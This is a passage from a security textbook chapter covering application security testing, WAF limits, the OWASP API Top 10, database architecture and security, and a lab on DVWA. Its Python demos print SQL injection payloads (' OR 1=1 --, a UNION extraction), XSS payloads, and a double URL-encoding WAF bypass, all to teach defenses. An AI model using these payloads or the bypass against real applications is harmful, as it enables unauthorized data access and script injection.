Answers: (1) A prepared statement sends the query structure and the data on separate channels, so user input is always treated as a value and can never be parsed as SQL; filtering tries to enumerate bad input and is routinely bypassed. (2) Reflected XSS is echoed from the request, stored XSS is saved server-side and served to all viewers, DOM-based XSS is introduced entirely client-side; HttpOnly keeps JavaScript from reading the session cookie. (3) An insecure direct object reference exposes another user’s object by changing an identifier; the fix is a server-side authorization check on every object access, not just authentication.

10.10 Application Security Testing: SAST, DAST, IAST, and DevSecOps#

Finding the vulnerabilities of this chapter before attackers do is the job of application security testing, and the methods differ by when and how they look. The two foundational, complementary techniques are SAST and DAST.

Static Application Security Testing (SAST) analyzes source code, bytecode, or binaries at rest, early in development, often inside the developer’s IDE or as a commit/CI check. It walks the code (typically over an abstract syntax tree, using the visitor pattern described in Chapter 17) to flag insecure patterns. Its strength is pinpointing the exact vulnerable line before it ships; its weakness is that, lacking runtime context, it produces more false positives.
Dynamic Application Security Testing (DAST) tests a running application from the outside in, like an ethical hacker, probing URLs, parameters, and APIs (OWASP ZAP, used in this book’s labs, is a DAST tool). It runs later, on a staging or pre-production deployment. Its strength is confirming that a flaw is actually exploitable (fewer false positives); its weakness is that it cannot point to the offending line and needs a fully built, running app.
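
A toy static check shows both the visitor-style traversal and why SAST misreports. The sketch uses Python's own `ast` module to flag calls to any method named `execute` whose first argument is an f-string or a `+`/`%` expression; the rule, the class name, and the sample code are invented for illustration and are far cruder than a real analyzer.

```python
import ast


class SqlConcatVisitor(ast.NodeVisitor):
    """Flags .execute(...) calls whose query is built inline from pieces."""

    def __init__(self):
        self.findings = []

    def visit_Call(self, node):
        is_execute = isinstance(node.func, ast.Attribute) and node.func.attr == "execute"
        if is_execute and node.args:
            first = node.args[0]
            # JoinedStr is an f-string; BinOp covers "..." + x and "..." % x.
            if isinstance(first, (ast.JoinedStr, ast.BinOp)):
                self.findings.append(node.lineno)
        self.generic_visit(node)  # keep walking into nested nodes


def scan(source: str) -> list:
    """Parse source code and return the line numbers the rule flags."""
    visitor = SqlConcatVisitor()
    visitor.visit(ast.parse(source))
    return visitor.findings


SAMPLE = '''\
cur.execute("SELECT * FROM users WHERE id = '" + user_id + "'")
cur.execute(f"SELECT * FROM users WHERE name = '{name}'")
cur.execute("SELECT * FROM users WHERE id = ?", (user_id,))
query = "SELECT * FROM t WHERE id = " + user_id
cur.execute(query)
'''
```

Running `scan(SAMPLE)` flags lines 1 and 2 and correctly ignores the parameterized call on line 3, but it misses line 5, where the tainted string arrives through a variable. The same rule would also flag a harmless concatenation of two constants. Without data-flow analysis or runtime context, a static rule has to guess, which is where both missed findings and false positives come from.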

Two further methods fill the gap between them. IAST (Interactive AST) instruments the running application to combine DAST-style execution with SAST-style code visibility, and RASP (Runtime Application Self-Protection) embeds in the production app to detect and block attacks live. The professional consensus is not to choose but to layer them in a DevSecOps pipeline: run SAST early so developers fix flaws as they type, then DAST (and IAST) in staging to verify exploitability and catch runtime misconfigurations, then RASP and a WAF in production. As Section 10.11 notes, a web application firewall is the runtime gatekeeper that filters SQL injection, cross-site scripting, and automated bot traffic. It is valuable, but it is a compensating control that complements secure code rather than replacing the testing above.

Knowledge Check

What does SAST examine and when, versus DAST, and why does SAST tend to produce more false positives?
Why is “SAST or DAST” the wrong framing?
Which design pattern do static analyzers use to traverse a program’s syntax tree, and where else does it appear in this book?

Answers: (1) SAST scans source/bytecode/binaries at rest early in development and lacks runtime context, so it over-reports; DAST probes a running app from the outside later in the lifecycle and confirms exploitability. (2) They cover different blind spots, code-level flaws versus runtime/exploitability, so a layered DevSecOps approach uses both. (3) The visitor pattern (Chapter 17), which traverses the abstract syntax tree applying checks at each node.

10.11 Web Application Firewalls and Their Limits#

A WAF inspects HTTP requests and blocks or logs those matching malicious patterns. It provides a useful additional layer against known attack signatures and automated scanners, and can virtually patch a vulnerable application while a permanent fix is being developed.

WAF Bypass Techniques#

WAFs can be bypassed via encoding tricks (double URL-encoding, Unicode variants), HTTP request smuggling, case variation, and payload fragments that individually pass rules but combine to an attack. A WAF is not a substitute for secure code; it is a compensating control for vulnerabilities that cannot be immediately remediated.
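
The double URL-encoding bypass can be reproduced with a toy filter. Both functions below are invented models: the "WAF" decodes once and looks for a signature, while the hypothetical application behind it decodes twice.

```python
from urllib.parse import quote, unquote


def naive_waf_allows(raw_value: str) -> bool:
    """Toy signature rule: decode once, then block anything containing "<script"."""
    return "<script" not in unquote(raw_value).lower()


def app_decodes_twice(raw_value: str) -> str:
    """Models a back end (or proxy chain) that URL-decodes the value a second time."""
    return unquote(unquote(raw_value))


PAYLOAD = "<script>alert(1)</script>"
single_encoded = quote(PAYLOAD, safe="")         # %3Cscript%3E...
double_encoded = quote(single_encoded, safe="")  # %253Cscript%253E...
```

The filter blocks `single_encoded` but allows `double_encoded`, because after one decoding pass the value still reads `%3Cscript%3E...`; the application's second pass then restores the original payload. The mismatch between what the WAF inspects and what the application finally interprets is the common thread in most bypasses.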

Related key terms for Sections 10.10 and 10.11:

SAST / DAST / IAST / RASP: static, dynamic, interactive, and runtime application security testing/protection.
DevSecOps: integrating security testing throughout the software development lifecycle.

10.12 The OWASP API Security Top 10#

The OWASP Top 10 earlier in this chapter targets web applications rendered for human users. Modern systems are increasingly driven by application programming interfaces (APIs) consumed by mobile apps, single-page front ends, and other services, and these have a distinct risk profile that OWASP tracks in a separate list, the OWASP API Security Top 10 (2023 edition).

Rank	Risk
API1	Broken Object Level Authorization (BOLA)
API2	Broken Authentication
API3	Broken Object Property Level Authorization
API4	Unrestricted Resource Consumption
API5	Broken Function Level Authorization (BFLA)
API6	Unrestricted Access to Sensitive Business Flows
API7	Server-Side Request Forgery (SSRF)
API8	Security Misconfiguration
API9	Improper Inventory Management
API10	Unsafe Consumption of APIs

The dominant theme is authorization, not injection. The top risk, BOLA, occurs when an endpoint accepts an object identifier from the client and returns or modifies that object without checking that the caller is allowed to access it, so changing an identifier in the request (for example from /accounts/123 to /accounts/124) exposes another user’s data. BFLA is its function-level counterpart, where a user reaches an administrative operation that should be off limits. Broken Object Property Level Authorization merges the older Excessive Data Exposure and Mass Assignment problems, where an API returns or accepts fields it should not. The remaining items reflect the realities of running many fast-changing endpoints: resource exhaustion, business flows abused through automation, SSRF from server-side fetches, misconfiguration, undocumented or forgotten endpoints (shadow and zombie APIs) under Improper Inventory Management, and blind trust in data from third-party APIs. The defenses are consistent: enforce object-level and function-level authorization on the server for every request, validate and restrict which properties a client may read or write, apply rate and resource limits, maintain an accurate inventory of every API and version, and treat data received from upstream APIs as untrusted input.
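
Property-level authorization (the mass-assignment half of API3) can be sketched as an explicit allow-list of writable fields. The field names and `apply_profile_update` are hypothetical.

```python
# Only these properties may be changed by the account owner (illustrative list).
WRITABLE_FIELDS = {"display_name", "email"}


def apply_profile_update(profile: dict, requested: dict) -> dict:
    """Apply a client-supplied update, rejecting any property not on the allow-list."""
    unexpected = set(requested) - WRITABLE_FIELDS
    if unexpected:
        raise ValueError(f"fields not writable: {sorted(unexpected)}")
    updated = dict(profile)
    updated.update(requested)
    return updated
```

A request body of `{"email": "new@example.com", "is_admin": true}` is rejected outright instead of silently promoting the caller, which is what happens when an API binds every incoming JSON property onto the stored object.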

10.13 Database Systems in Depth: Engines, Replication, and Security#

The primer in Section 10.4 distinguished relational databases from the modern non-relational families. This section goes deeper into how production database systems are built and operated, because their architecture (engines, schemas, and replication) directly shapes both performance and the attack surface.

Relational Database Management Systems#

A relational database management system (RDBMS) stores data in tables of rows and columns, enforces a schema, guarantees ACID transactions (atomicity, consistency, isolation, durability), and is queried with SQL. The widely used systems differ mainly in licensing, extensibility, and ecosystem:

PostgreSQL is an open-source, standards-compliant object-relational system known for extensibility (custom types and extensions such as PostGIS and pgvector) and strong concurrency through multiversion concurrency control (MVCC).
MySQL is the most widely deployed open-source RDBMS, now owned by Oracle, built around pluggable storage engines (described below) and popular in web stacks.
MariaDB is a community-developed fork of MySQL, created in 2009 by MySQL’s original author in response to Oracle’s announced acquisition of Sun (and thus of MySQL); it stays largely drop-in compatible while adding its own engines and features.
Oracle Database is a feature-rich commercial RDBMS with the PL/SQL procedural language, common in large enterprises.
Microsoft SQL Server is Microsoft’s commercial RDBMS with the T-SQL dialect, tightly integrated with the Windows and Azure ecosystems.
IBM Db2 is IBM’s commercial RDBMS family for enterprise and mainframe workloads.
Amazon Aurora is a cloud-native RDBMS offered in MySQL-compatible and PostgreSQL-compatible editions that re-engineers the storage layer: it separates compute from a distributed storage service that automatically keeps six copies of the data across three Availability Zones, backs up continuously to object storage, and supports up to fifteen low-lag read replicas. It shows how cloud databases trade the single-server model for a fault-tolerant, horizontally scaled design.

Non-Relational, In-Memory, and Graph Databases#

Non-relational (NoSQL) systems, introduced in Section 10.4, trade strict schemas and joins for scale and flexibility, and come in key-value, document, wide-column, vector, and time-series families. Two specialized classes deserve their own treatment.

In-memory databases keep the working dataset in RAM rather than on disk, which removes disk latency and delivers sub-millisecond reads, at the cost of volatility (the contents of RAM are lost on power failure) and higher memory cost. Examples are Redis and Memcached (caching, sessions, and queues) and SAP HANA (analytics). Durability is added back through periodic snapshots, append-only logs, or replication. The security implication is twofold: sensitive data sits in memory, a target for memory scraping, and several in-memory stores historically shipped with no authentication and were exposed directly to the internet, which led to mass compromise.

Graph databases store data as nodes (entities), edges (relationships), and properties, and query relationships directly rather than through expensive joins. Examples are Neo4j (queried with Cypher) and Amazon Neptune. They excel at fraud detection, recommendations, and social networks, and, notably for this book, at security analysis: tools such as BloodHound (Chapter 9) load Active Directory relationships into a graph database to find the shortest attack path to domain administrator.
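The idea of an attack path as a shortest path through a relationship graph can be sketched without a graph database at all. The example below is a plain breadth-first search in Python, not how BloodHound or Neo4j are implemented; the node names and the meaning of an edge ("the source can take control of or act as the target") are assumptions made for illustration.

```python
from collections import deque

# Hypothetical edges: "source can take control of / act as target".
EDGES = {
    "user:alice": ["group:helpdesk"],
    "group:helpdesk": ["host:ws01"],
    "host:ws01": ["user:svc_backup"],
    "user:svc_backup": ["group:domain_admins"],
    "user:bob": ["host:ws02"],
}


def shortest_path(graph, start, goal):
    """Breadth-first search; returns the shortest list of nodes or None."""
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        node = path[-1]
        if node == goal:
            return path
        for nxt in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None
```

Calling `shortest_path(EDGES, "user:alice", "group:domain_admins")` returns the five-node chain from alice to the administrators group, while the same call for `"user:bob"` returns `None`. A graph database answers the same kind of question with a query over stored relationships instead of application code.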

Schemas: Schema-on-Write versus Schema-on-Read#

A relational database uses schema-on-write: the structure (tables, columns, types, and constraints) is defined in advance, and the database rejects data that does not fit, which enforces consistency and validation at the cost of flexibility. Many NoSQL systems instead use a loose, flexible, or undefined schema (schema-on-read): records in the same collection may have different fields, and meaning is imposed by the application when it reads the data. Loose schemas make rapid iteration and heterogeneous data easy, but they shift validation to the application and introduce security risk: unexpected or attacker-controlled fields can be injected (NoSQL injection and mass assignment, where a client sets fields it should not), and inconsistent records can break assumptions elsewhere. The defense is to validate and constrain input even when the database does not, for example with application-level schemas and allowlisted fields.
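An application-level schema with allowlisted fields might look like the following minimal sketch. The field names, the `ALLOWED_FIELDS` table, and the `validate_profile_update` function are hypothetical; a production system would more likely use a validation library, but the principle is the same: reject anything the client is not explicitly allowed to set, and reject values of the wrong type.

```python
# Hypothetical allowlist: the only fields a client may set, with their types.
ALLOWED_FIELDS = {"display_name": str, "email": str}


def validate_profile_update(payload: dict) -> dict:
    """Return a clean copy of payload, or raise ValueError."""
    unexpected = set(payload) - set(ALLOWED_FIELDS)
    if unexpected:
        # Blocks mass assignment such as {"role": "admin"}.
        raise ValueError(f"unexpected fields: {sorted(unexpected)}")
    for field, expected_type in ALLOWED_FIELDS.items():
        if field in payload and not isinstance(payload[field], expected_type):
            # Blocks operator objects such as {"email": {"$ne": None}}.
            raise ValueError(f"{field} must be {expected_type.__name__}")
    return dict(payload)
```

The type check matters as much as the field check: a common NoSQL injection shape is a nested object where a string was expected, and it is rejected here before it ever reaches the database driver.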

Database Kernels and Engines#

Underneath the SQL or API surface, the database engine is the core software that actually stores data, builds indexes, plans and executes queries, and enforces transactions, concurrency (through locking and MVCC), and durability (through write-ahead logging). The term database kernel refers to this core; Oracle, for example, speaks of its kernel. A key architectural idea is the pluggable storage engine: MySQL and MariaDB let each table choose its engine, and the choice changes behavior. InnoDB, the default, is transactional and ACID-compliant with row-level locking and crash recovery; the older MyISAM can be faster for some read-mostly workloads but lacks transactions and crash recovery and uses table-level locking; in-memory engines hold tables in RAM. Other systems embed specialized engines (for example RocksDB and WiredTiger underpin various databases). The engine choice matters for security because it determines whether operations are atomic and recoverable, how encryption at rest (transparent data encryption) is applied, and how audit logging behaves.
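What a transactional engine buys can be shown with a short sketch. SQLite from the Python standard library is used here purely as a stand-in for any transactional engine; it is not MySQL and has no pluggable engines. The table, the `transfer` helper, and the `balances` helper are hypothetical.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE accounts (name TEXT PRIMARY KEY, "
    "balance INTEGER CHECK (balance >= 0))"
)
conn.executemany("INSERT INTO accounts VALUES (?, ?)", [("alice", 100), ("bob", 0)])
conn.commit()


def transfer(conn, src, dst, amount):
    """Move amount from src to dst atomically; return True on success."""
    try:
        with conn:  # commits on success, rolls back if an exception escapes
            conn.execute(
                "UPDATE accounts SET balance = balance + ? WHERE name = ?",
                (amount, dst),
            )
            # Violates the CHECK constraint when src has too little money.
            conn.execute(
                "UPDATE accounts SET balance = balance - ? WHERE name = ?",
                (amount, src),
            )
        return True
    except sqlite3.IntegrityError:
        return False


def balances(conn):
    return dict(conn.execute("SELECT name, balance FROM accounts ORDER BY name"))


print(transfer(conn, "alice", "bob", 500), balances(conn))  # overdraft attempt
print(transfer(conn, "alice", "bob", 30), balances(conn))   # valid transfer
```

In the overdraft attempt the credit to bob is applied first and then undone when the debit fails, so neither account changes. On an engine without transactions the first update would remain in place, which is exactly the kind of half-applied state an attacker or a crash can leave behind.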

Replication: Synchronous versus Asynchronous#

Replication copies data from a primary (writer) to one or more replicas for availability, durability, and read scaling. The crucial distinction is when the primary considers a write complete:

Synchronous replication: the primary waits until at least one replica acknowledges the write before it reports the commit as complete. No acknowledged data is lost if the primary fails (a recovery point objective of zero), but every commit pays the round-trip latency, so synchronous replication is normally used within a region or across nearby Availability Zones (Aurora’s storage layer and RDS Multi-AZ work this way).
Asynchronous replication: the primary commits immediately and streams changes to replicas in the background. This is fast and scales across long distances, but a failure can lose the most recent writes that had not yet reached a replica (the replication lag window), and replicas can serve slightly stale data. It is the usual choice for cross-region disaster recovery and read scaling.

The trade-off is the classic one between consistency and latency: synchronous favors safety, asynchronous favors performance.
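The difference in what can be lost is easy to see in a toy model. The sketch below is an in-process simulation, not a replication protocol: the `Primary` class, its lists, and `lost_on_failover` are hypothetical, and "shipping" a write is just appending to a second list.

```python
class Primary:
    def __init__(self, synchronous: bool):
        self.synchronous = synchronous
        self.log = []           # writes applied on the primary
        self.replica_log = []   # writes the replica has received
        self.acknowledged = []  # writes the client was told are committed

    def write(self, value):
        self.log.append(value)
        if self.synchronous:
            # Wait for the replica before acknowledging the client.
            self.replica_log.append(value)
        self.acknowledged.append(value)

    def ship_pending(self):
        """Background streaming: copy anything the replica has not yet seen."""
        self.replica_log.extend(self.log[len(self.replica_log):])


def lost_on_failover(primary):
    """Acknowledged writes missing from the replica if the primary dies now."""
    return [w for w in primary.acknowledged if w not in primary.replica_log]
```

With `Primary(synchronous=True)`, `lost_on_failover` is always empty. With `Primary(synchronous=False)`, any write made since the last `ship_pending()` call has been acknowledged to the client but would be lost on failover, which is the nonzero recovery point objective described above.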

Read (Only) Replicas#

A read replica is a copy of the database that serves read-only queries, offloading reporting and traffic from the primary so the system scales reads horizontally. Most read replicas use asynchronous replication, so they are eventually consistent and may lag the primary by milliseconds to seconds, which is acceptable for analytics and search but not for read-after-write guarantees. Many platforms can promote a read replica to become a new primary, which doubles as a disaster-recovery and migration mechanism. Aurora replicas are a special case: because all replicas share the same distributed storage volume, their lag is typically under 100 milliseconds.
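One common way to live with replica lag is to route a session's reads to the primary for a short window after that session writes. The sketch below is one such policy under stated assumptions: `choose_endpoint` and its `max_replica_lag` parameter are hypothetical names, timestamps are plain seconds, and the one-second default is an illustrative bound rather than a measured value.

```python
from typing import Optional


def choose_endpoint(
    last_write_at: Optional[float],
    now: float,
    max_replica_lag: float = 1.0,
) -> str:
    """Pick where a session's read should go.

    Reads go to the primary while the session's own last write may not
    have reached the replicas yet; otherwise they go to a replica.
    """
    if last_write_at is not None and now - last_write_at < max_replica_lag:
        return "primary"
    return "replica"
```

A session that wrote half a second ago reads from the primary, and a session that has never written, or wrote long ago, reads from a replica. The policy only helps if `max_replica_lag` is a real upper bound, which is one reason to alert on abnormal lag.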

Cloud Database Instance Classes#

In a managed cloud database you do not choose a physical server; you choose an instance class that fixes the CPU, memory, and scaling behavior, and that choice has real security consequences, mostly for availability and cost. The main families are:

Burstable classes (for example AWS db.t3 and db.t4g, or Azure B-series) provide a low baseline of CPU and accumulate CPU credits while idle that let them burst to full performance for short periods. They are inexpensive and suit development, test, and light or spiky workloads.
Memory-optimized classes (for example AWS db.r6g and db.x2g, or Azure E and M series) offer a high ratio of RAM to CPU for large working sets, in-memory databases, caching, and heavy analytical queries.
Serverless (Aurora Serverless v2, Azure SQL Database serverless) removes the fixed instance entirely: capacity scales automatically with load between a configured minimum and maximum, is billed per unit of use (Aurora measures this in Aurora Capacity Units, each about 2 GiB of memory, scaling in 0.5-unit steps), and can scale down or pause when idle.

The security property at stake here is mostly the A in the CIA triad, availability, together with a newer concern, cost as an attack surface.

Burstable. Strength: low cost makes it easy to run isolated test and staging databases instead of sharing production. Weakness: it is fragile under load, because performance depends on CPU credits, so an attacker can deliberately exhaust the credits (and an accidental spike can do the same) and throttle the database, a cheap denial-of-service against an availability-sensitive component; in burst-unlimited mode the same pressure silently inflates the bill (a denial-of-wallet attack). Security-critical functions such as logging, monitoring, and authentication should not run on a credit-starved burstable instance. Defenses are to alarm on a low CPU-credit balance, cap unlimited bursting, and use a non-burstable class for production.
Memory-optimized. Strength: large memory headroom resists resource-exhaustion attacks and sustains heavy query loads, which improves availability, and it is the right home for in-memory databases and large caches. Weakness: more sensitive data is resident in RAM for longer, which raises the value of memory scraping and, on shared multi-tenant hardware, of speculative-execution side channels (the Spectre and Meltdown class); large plaintext caches also widen confidentiality exposure if the host is compromised. Defenses are encryption in use where available, strong tenant isolation, and keeping secrets out of cacheable query paths.
Serverless. Strength: automatic elasticity absorbs legitimate spikes and a degree of volumetric load, improving availability and resilience, and scaling toward zero when idle shrinks the running attack surface and the cost. Weakness: that same elasticity is the textbook target of a denial-of-wallet (economic denial-of-sustainability) attack, in which an adversary generates load purely to drive autoscaling and run up the bill; auto-scaling can also mask a slow attack as ordinary growth, and cold starts add latency. Defenses are to set a hard maximum capacity, configure budget and anomaly alarms, rate-limit and authenticate the front end so only legitimate traffic reaches the database, and place a cache or queue in front to dampen spikes.
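The credit-exhaustion weakness of burstable classes can be made concrete with a toy model. All numbers and names below are hypothetical and are not taken from any provider's documentation: the model simply earns a fixed number of credits per minute, spends credits in proportion to load, and treats a balance of zero as "throttled to baseline".

```python
def simulate_credits(start_balance, earn_per_min, load_per_min, minutes):
    """Return the credit balance after each minute (never below zero)."""
    balance = start_balance
    history = []
    for _ in range(minutes):
        balance = max(0.0, balance + earn_per_min - load_per_min)
        history.append(balance)
    return history


def minutes_until_throttled(start_balance, earn_per_min, load_per_min):
    """Minutes of sustained load before the balance hits zero, or None."""
    drain = load_per_min - earn_per_min
    if drain <= 0:
        return None  # the load is sustainable at the baseline earn rate
    return start_balance / drain
```

With a starting balance of 60 credits, an earn rate of 0.25 per minute, and an attacker holding the load at 1.0 per minute, `minutes_until_throttled(60, 0.25, 1.0)` gives 80 minutes. An alarm on a falling credit balance fires well before that point, which is why it appears among the defenses above.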

The cross-cutting lesson is that in the cloud the instance class is a security decision, not just a performance one: it sets the ceiling for availability under attack and decides whether a flood becomes an outage, a throttle, or a surprise invoice. Right-sizing, hard capacity caps, and cost-anomaly alarms are therefore security controls.
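A hard capacity cap turns an unbounded denial-of-wallet risk into a bounded one, and the bound is simple arithmetic. In the sketch below the price per capacity-unit-hour is a hypothetical placeholder, not a published rate, and the function names are illustrative; the 2 GiB per unit figure is the approximation given earlier in this section.

```python
GIB_PER_ACU = 2  # approximate memory per Aurora Capacity Unit, as stated above


def acu_to_gib(acu: float) -> float:
    """Approximate memory available at a given capacity setting."""
    return acu * GIB_PER_ACU


def worst_case_cost(max_acu: float, price_per_acu_hour: float, hours: float) -> float:
    """Upper bound on spend if an attacker pins capacity at the maximum."""
    return max_acu * price_per_acu_hour * hours
```

For example, with a maximum of 16 units and a hypothetical price of 0.125 per unit-hour, a flood that pins capacity at the cap for 100 hours costs at most `worst_case_cost(16, 0.125, 100)`, which is 200.0 in whatever currency the price is quoted. Without a configured maximum there is no such ceiling to compute, only an anomaly alarm to rely on.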

Attacks and Defenses#

Databases are the ultimate target of most breaches because they hold the data, and the systems above add their own exposure.

Common attacks include SQL and NoSQL injection (Sections 10.3 and 10.4); weak, default, or shared credentials and the public exposure of databases (unauthenticated Redis, MongoDB, and Elasticsearch instances have been mass-compromised and held for ransom); excessive privileges that turn one compromised account into full access; unencrypted connections that allow sniffing; theft of backups and snapshots; privilege escalation and data exfiltration; and ransomware against the data store. Replication adds its own surface: an unencrypted or unauthenticated replication channel can be sniffed or tampered with in transit, a compromised replica can leak the entire dataset, stale reads from a lagging replica can be abused, and the ability to promote a replica is a path to takeover if it is not tightly controlled.

Core defenses are to apply least privilege and strong, unique authentication (ideally with a secrets manager and MFA for administrators); never expose a database directly to the internet (place it in a private subnet behind security groups and a bastion or proxy); encrypt data in transit with TLS and at rest with transparent data encryption; use parameterized queries and server-side input validation to stop injection; keep engines patched; enable auditing and database activity monitoring; and take tested, immutable, offline backups. For replication specifically, encrypt and authenticate the replication channel, restrict and monitor which principals can create or promote replicas, treat every replica as holding production data with the same hardening as the primary, and alert on abnormal replication lag or integrity failures.

Chapter Summary#

This chapter examined the security of web applications. It began with how the web works through HTTP, sessions, and the same-origin policy, then organized the major risks around the OWASP Top 10. It covered injection in general and SQL injection in depth, cross-site scripting, and the high-impact class of broken access control along with CSRF and SSRF, followed by authentication and session management and security misconfigurations. It then turned to defense and tooling, including the web-application testing toolkit, application security testing with SAST, DAST, IAST, and DevSecOps, and the role and limits of web application firewalls. The throughline is that most web compromises trace back to a few recurring flaws and that secure design, input and output handling, and layered testing are far more durable than a single perimeter control.

Why This Matters#

Web applications are the primary attack surface for most organizations: they are internet-facing, complex, written by many developers over years, and directly handle sensitive data. The OWASP Top 10 risks are found in the majority of applications tested; they are not rare edge cases. A developer who understands injection, XSS, and broken auth and applies the corresponding fixes as a matter of routine produces far fewer vulnerabilities than one who relies on scanners to catch what they missed.

News in Focus: SQL Injection Breaches That Persist#

SQL injection vulnerabilities in web applications continue to produce major breaches even though SQLi is one of the oldest and best-understood vulnerability classes. Several headline breaches of credit card processors, retailers, and government agencies in the last decade were attributed to SQLi in applications that did not use parameterised queries, a fix that has been well documented since the late 1990s. The persistence of this vulnerability class reflects the cost of not making secure coding practices a hiring and review requirement.

# Chapter 10 -- Safe SQLi demonstration with SQLite
import sqlite3

# ── Safe vs unsafe query comparison ────────────────────────────────────────────
conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.executescript(
    "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT);"
    "INSERT INTO users VALUES (1,'alice','admin');"
    "INSERT INTO users VALUES (2,'bob','user');"
    "INSERT INTO users VALUES (3,'carol','user');"
)

def unsafe_login(username):
    # NEVER do this in real code
    query = f"SELECT * FROM users WHERE username = '{username}'"
    try:
        return cur.execute(query).fetchall()
    except Exception as e:
        return [f"DB ERROR: {e}"]

def safe_login(username):
    # Parameterised query: data can NEVER become code
    return cur.execute("SELECT * FROM users WHERE username = ?", (username,)).fetchall()

print("=== Safe vs Unsafe SQL Query Demo ===\n")
tests = [
    ("Normal input",        "alice"),
    ("SQLi bypass attempt", "' OR 1=1 --"),
    ("Union extraction",    "' UNION SELECT id,username,role FROM users --"),
]

for label, payload in tests:
    unsafe_result = unsafe_login(payload)
    safe_result   = safe_login(payload)
    print(f"  Input ({label}): {payload!r}")
    print(f"    Unsafe query returned : {unsafe_result}")
    print(f"    Safe query returned   : {safe_result}")
    print()

conn.close()

# ── XSS output encoding demo ──────────────────────────────────────────────────
import html

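xss_payloads = [
    '<script>alert(1)</script>',
    '"><img src=x onerror=alert(1)>',
    # html.escape() does not neutralise URL schemes: this payload stays
    # dangerous if placed in an href, so URLs also need scheme validation.
    "javascript:alert('xss')",
]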

print("=== XSS Output Encoding Demo ===")
for p in xss_payloads:
    encoded = html.escape(p)
    print(f"  Raw    : {p}")
    print(f"  Encoded: {encoded}\n")

=== Safe vs Unsafe SQL Query Demo ===

  Input (Normal input): 'alice'
    Unsafe query returned : [(1, 'alice', 'admin')]
    Safe query returned   : [(1, 'alice', 'admin')]

  Input (SQLi bypass attempt): "' OR 1=1 --"
    Unsafe query returned : [(1, 'alice', 'admin'), (2, 'bob', 'user'), (3, 'carol', 'user')]
    Safe query returned   : []

  Input (Union extraction): "' UNION SELECT id,username,role FROM users --"
    Unsafe query returned : [(1, 'alice', 'admin'), (2, 'bob', 'user'), (3, 'carol', 'user')]
    Safe query returned   : []

=== XSS Output Encoding Demo ===
  Raw    : <script>alert(1)</script>
  Encoded: &lt;script&gt;alert(1)&lt;/script&gt;

  Raw    : "><img src=x onerror=alert(1)>
  Encoded: &quot;&gt;&lt;img src=x onerror=alert(1)&gt;

  Raw    : javascript:alert('xss')
  Encoded: javascript:alert(&#x27;xss&#x27;)

Review Questions (MCQ)#

Q1. The root cause of SQL injection is: A. Using a database B. Constructing queries by concatenating user-supplied strings C. Using HTTP D. Missing HTTPS

Q2. A parameterised query prevents SQLi because: A. It encrypts the query B. Data is sent separately from query structure and cannot become SQL code C. It validates input length D. It uses a stored procedure

Q3. Stored XSS is more dangerous than reflected XSS because: A. It affects more browsers B. It persists in the database and executes for every victim who views the page C. It is harder to detect D. It bypasses TLS

Q4. CSRF is mitigated by the SameSite=Strict cookie attribute because: A. Cookies are encrypted B. Cookies are not sent with cross-site requests C. The cookie expires immediately D. The cookie is HttpOnly

Q5. SSRF in a cloud environment is particularly severe because: A. It bypasses firewalls B. The Instance Metadata Service exposes IAM credentials C. It causes DDoS D. It breaks TLS

Q6. IDOR vulnerabilities are in the OWASP category: A. Cryptographic Failures B. Broken Access Control C. Injection D. Security Misconfiguration

Q7. The Content-Security-Policy header primarily mitigates: A. SQL injection B. CSRF C. XSS by restricting executable content sources D. Session fixation

Q8. The HSTS header forces: A. HTTP-only connections B. HTTPS-only connections for the defined period C. Encrypted cookies D. SameSite cookies

Q9. A WAF is best described as: A. A complete replacement for secure code B. A compensating control that filters known attack patterns C. A vulnerability scanner D. An intrusion detection system

Q10. DOM-based XSS differs from reflected XSS in that the payload: A. Requires a database B. Need not reach the server; it is processed and executed entirely by client-side script in the browser C. Is persistent D. Only works in Internet Explorer

Answers: Q1 B, Q2 B, Q3 B, Q4 B, Q5 B, Q6 B, Q7 C, Q8 B, Q9 B, Q10 B.

Lab Assignment#

Part A – SQLi: Using DVWA or SQLi-labs (locally), find and exploit at least two forms of SQL injection (error-based and blind). Document: the vulnerable parameter, the injection payload, the database version and at least one table name extracted.

Part B – XSS: In DVWA, find and demonstrate reflected, stored, and DOM-based XSS. For each, document: the injection point, the payload, and the impact (what could an attacker do with this XSS).

Part C – Security headers audit: Use curl -I https://<any-public-site> on three websites you are not targeting maliciously (large companies with public bug bounty programs). Document which security headers are present and which are missing. Grade each site A-F.

Part D – CSRF protection analysis: Inspect the login and account-update forms of a web application you own or are authorized to test. Identify whether CSRF tokens are present, whether they are validated server-side, and whether SameSite attributes are set on session cookies.

References#

[OWASPFoundation21]

OWASP Foundation. OWASP Top 10:2021. https://owasp.org/Top10/, 2021.

[OWASPFoundation25]

OWASP Foundation. OWASP Top 10:2025. https://owasp.org/Top10/2025/, 2025.

OWASP. Damn Vulnerable Web Application (DVWA); WebGoat; ZAP. https://owasp.org/
OWASP Cheat Sheet Series: SQL Injection Prevention, Cross-Site Scripting Prevention, Session Management.